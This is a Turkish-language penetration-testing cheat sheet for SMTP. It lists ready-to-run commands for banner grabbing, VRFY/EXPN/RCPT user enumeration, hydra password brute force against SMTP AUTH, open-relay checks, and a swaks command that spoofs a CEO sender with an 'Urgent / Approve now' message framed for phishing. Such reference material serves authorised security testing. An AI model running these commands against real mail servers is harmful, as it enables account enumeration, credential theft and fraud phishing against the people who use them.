SMTP Commands
network smtp
SMTP (25/465/587) banner, kullanıcı enum, open relay ve kimlik brute için zengin bir yüzeydir. Komut diyalogunu elle konuşmak NSE kadar değerlidir.
Metodoloji
Section titled “Metodoloji”-
Banner ve desteklenen komutları (
EHLO) al. -
VRFY/EXPN/RCPT ile kullanıcı enum dene.
-
AUTH mekanizmalarını ve brute’u çalıştır.
-
Open relay ve smuggling hipotezlerini doğrula.
nmap -Pn -sV -p25,465,587 --script smtp-commands,smtp-enum-users,smtp-open-relay TARGETnc -nv TARGET 25openssl s_client -connect TARGET:465 -crlfopenssl s_client -starttls smtp -connect TARGET:587 -crlfTemel diyalog
Section titled “Temel diyalog”EHLO pentest.localVRFY rootEXPN staffMAIL FROM:<attacker@evil.com>RCPT TO:<victim@corp.local>DATASubject: test
body.QUITKullanıcı enum
Section titled “Kullanıcı enum”smtp-user-enum -M VRFY -U users.txt -t TARGETsmtp-user-enum -M EXPN -U users.txt -t TARGETsmtp-user-enum -M RCPT -U users.txt -t TARGET -f attacker@evil.comnmap -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} TARGETAUTH brute
Section titled “AUTH brute”EHLO aAUTH LOGINhydra -L users.txt -P rockyou.txt smtp://TARGEThydra -L users.txt -P rockyou.txt smtp://TARGET -s 587 -Sswaks --to victim@corp.local --from attacker@corp.local --server TARGET --auth LOGIN --auth-user user --auth-password pass --body 'x'Open relay
Section titled “Open relay”nmap -p25 --script smtp-open-relay TARGETswaks --to external@gmail.com --from spoof@corp.local --server TARGET --body 'relay-test'MAIL FROM/RCPT TO dış domain kabul ediyorsa relaySpoof / header
Section titled “Spoof / header”swaks --to victim@corp.local --from ceo@corp.local --server TARGET --header 'Subject: Urgent' --body 'Approve now'From / Reply-To / Return-Path tutarsızlıkları phishing içinChecklist
Section titled “Checklist”[ ] EHLO/capabilities alındı[ ] VRFY/EXPN/RCPT enum denendi[ ] AUTH brute / geçerli hesap[ ] Open relay doğrulandı veya elendi[ ] Spoof / smuggling için sonraki adım not edildi